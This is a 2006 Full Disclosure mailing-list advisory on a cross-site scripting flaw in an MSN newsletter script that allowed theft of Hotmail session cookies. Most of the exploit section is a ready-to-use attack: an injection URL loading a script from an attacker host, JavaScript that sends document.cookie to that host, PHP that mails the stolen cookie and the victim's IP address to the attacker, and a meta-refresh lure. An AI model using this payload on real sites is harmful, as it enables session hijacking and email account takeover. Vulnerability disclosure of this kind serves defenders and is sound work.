Full Disclosure mailing list archives
Hotmail/MSN Cross Site Scripting Vulnerability
From: simo () morx org
Date: Thu, 10 Aug 2006 14:36:08 -0000 (GMT)
Hotmail/MSN Cross Site Scripting Vulnerability Author: Simo64 Contact: simo64_at_morx_dot_org Discovered: 07/25/2006 Published: 08/10/2006 Vendor: MSN.com Service: Hotmail.com Webmail Service Vulnerability: Cross Site Scripting (Cookie-Theft) Severity: Medium/High Tested on: IE 6.0, firefox 1.5 and Opera (should work on all browsers) Morx Security Research Team http://www.morx.org Details: newsletter.msn.com's insite.asp script is prone to cross-site scripting attacks. This problem is due to a failure in the application to properly sanitize user-supplied input. Impact: an attacker can exploit the vulnerable script to have arbitrary script code executed in the browser of an authentified msn user in the context of the msn webpage. resulting in the theft of cookie-based authentication giving the attacker temporary access to the victim's email account (until the cookie expires - about 24 hours) as well as other type of attacks. Exploit: http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script src=http://attacker/redir.js> Where redir.js code can be : location.href='http://attacker-site/cookie-grabber.php?cookie='+escape(document.cookie) and cookie-grabber.php can be: <? $cookie = $_GET['cookie']; $ip = getenv("REMOTE_ADDR"); $msg = "Cookie: $cookie\nIP Address: $ip"; $subject = "cookie"; mail("your () email org", $subject, $msg); header ("location: http://attacker-site/some-pic.jpg"); ?> the attacker also would use an html file to redirect the victim to the xss location as an example of that: <meta http-equiv="refresh" content="0; url=http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script src=http://attacker/redir.js>"> Disclaimer: this entire document is for eductional, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your OWN risk. The information provided in this advisory is to be used/tested on your OWN machine/Account. I cannot be held responsible for any of the above. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Hotmail/MSN Cross Site Scripting Vulnerability simo (Aug 10)